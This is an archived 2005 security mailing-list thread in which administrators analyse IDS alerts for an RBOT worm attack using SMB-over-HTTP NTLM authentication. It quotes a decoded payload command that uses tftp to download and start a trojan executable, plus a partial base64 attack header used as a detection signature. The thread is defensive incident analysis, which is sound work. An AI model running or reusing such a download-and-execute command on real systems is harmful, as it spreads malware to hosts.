Re: New http attack?

From: Alex (incidents_at_alex.gotdns.org)
Date: 06/10/05

  • Next message: Kevin Timm: "Re: New http attack?" 
    Date: Thu, 9 Jun 2005 21:06:33 -0600 (MDT)
To: Ron <iago@valhallalegends.com>

    Isn't "-i 0.0.0.0" telling tftp to what interface to bind?

    0.0.0.0 is usually a generic address that means to bind to ALL
    interfaces... I suppose they are just being lazy -- they already know the
    IP address of the server!

    -Alex

    On Thu, 9 Jun 2005, Ron wrote:

    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    >
    > Out of curiosity, I notice that when I decode any hit on my IDS with
    > that exploit, it ends up with the following command (along with
    > shellcode and padding, of course):
    >
    > cmd /c tftp -i 0.0.0.0 GET wuamkop.exe&start wuamkop.exe&exit
    >
    > Do you know why it would be "0.0.0.0"? Is it just failing to get the
    > proper ip for the trojan or what?
    >
    > Thanks,
    > Ron
    >
    >
    > Kirby Angell wrote:
    >> - From http://isc.sans.org/diary.php?date=2005-06-03:
    >>
    >> "On a similar note, we've had one report of what looks to be like
    >> another RBOT vector, this time SMB over HTTP. An IIS server will accept
    >> multiple forms of authentication, including (non-IIS folks cover your
    >> eyes, this will hurt) NTLM via base64 encoding. You looked....I warned
    >> you! Look for:
    >>
    >> GET / HTTP/1.0
    >> Host: xxx.xxx.xxx.xxx
    >> Authorization: Negotiate
    >> YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQ.....
    >>
    >> All that gibberish can be decoded with good ol' "mimencode -u" to reveal
    >> an RBOT tftp download command. The long and short of it is POLP -
    >> Principle of Least Privilege. Disable any authentication methods that
    >> are unnecessary, especially on your big-bad-world-facing servers. Me, I
    >> don't trust anyone to play nicely, inside or out."
    >>
    >> Keith T. Morgan wrote:
    >>
    >>>> A google search didn't turn up anything of value on this, so I'm posting
    >>>> to the list. If I've missed something that's common knowledge here, I
    >>>> appologize for inverting the signal/noise ratio a bit with this post.
    >>>>
    >>>> We've seen an attack that triggered a snort bleeding-edge hit for "smb
    >>>> over http authentication." This isn't particularly alarming, but, what
    >>>> caught my attention is what appears to be a very large buffer in part of
    >>>> the packet.
    >>>>
    >>>> The ascii decoded capture looks a bit like this:
    >>>>
    >>>> GET / HTTP/1.0
    >>>> Host: obfuscated
    >>>> Authorization: Negotiate <what may be an encrypted password>
    >>>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB.
    >>>>
    >>>> This "QUFB" string is repeated for 1400 bytes or so, and I'm assuming
    >>>> went beyond the single packet capture I have.
    >>>>
    >>>> The IIS logs indicate a simple GET / with a 401 response code.
    >>>>
    >>>> Has anyone seen this "QUFBQUFB" string in a worm, virus, or exploit
    >>>> floating around out there somewhere? I think chances of this being a FP
    >>>> are low since we're not using NTLM or windows native/ad authentication
    >>>> on this site.
    >>>>
    >>>>
    >>>> -- Keith Morgan
    >>>> -- CISSP, MCP, CCSE/CCSA
    >>>>
    >>>> "Hey Pants... Any advice for getting through turn 1 with 55 motorcycles
    >>>> on the grid?"
    >>>> "Yeah. Don't Crash."
    >>>> -- Sage motorcycle roadracing advice from Shawn (Pants) Romano
    >>>> **************************************************************************************************
    >>>> The contents of this email and any attachments are confidential.
    >>>> It is intended for the named recipient(s) only.
    >>>> If you have received this email in error please notify the system manager or the
    >>>> sender immediately and do not disclose the contents to anyone or make copies.
    >>>>
    >>>> ** this message has been scanned for viruses, vandals and malicious content **
    >>>> **************************************************************************************************
    >>>>
    >>
    >>
    >>
    >> --
    >> Thank you,
    >>
    >> Kirby Angell
    >> Get notified anytime your website goes down!
    >> http://www.alertra.com
    >> key: 9004F4C0
    >> fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
    > -----BEGIN PGP SIGNATURE-----
    > Version: GnuPG v1.9.15 (GNU/Linux)
    > Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
    >
    > iD8DBQFCqKL0fqSf2EkP4p4RAnvvAJwMvlwYEyY+kHc1YllAF0GeZmtxcACfYzFh
    > FJNQRITUvUEjMWvwPSVEx7w=
    > =jR8f
    > -----END PGP SIGNATURE-----
    >

  • Next message: Kevin Timm: "Re: New http attack?"

    Relevant Pages

    • Re: Networks and wireless etc
      ... When bind() assigns an interface that contradicts the routing table the ... "For a sending host, if the source address is specified by the sending ...
      (microsoft.public.win32.programmer.networks)
    • Re: Re[6]: mpd pppoe client problems
      ... I used to use ipfw as a firewall.. ... and natd makes too heavy cpu load. ... your interface goes up. ... How can I make those applications bind to the new ...
      (freebsd-net)
    • Re: [RFC] ip / ifconfig redesign
      ... I'm only guessing since I'm not entirely sure what Mr. Boldi means, ... but my guess is that he's proposing that an app can bind to an IP ... interface and then later if that IP does get assigned to an interface ... another one without apps noticing. ...
      (Linux-Kernel)
    • Re: updating rules after IP address change
      ... Bind to an interface you are fine ... Understanding the ISA 2004 Access Rule Processing ... Microsoft ISA Server Partners: Partner Hardware Solutions ...
      (microsoft.public.isa)
    • Re: OT? C# integration into MFC C++
      ... utilities that has a C# interface. ... I believe that one of the selling ... points of Studio.net was that because of the common language layer, ... Ron, if you go into your project settings and specify the /clr switch, then ...
      (microsoft.public.vc.mfc)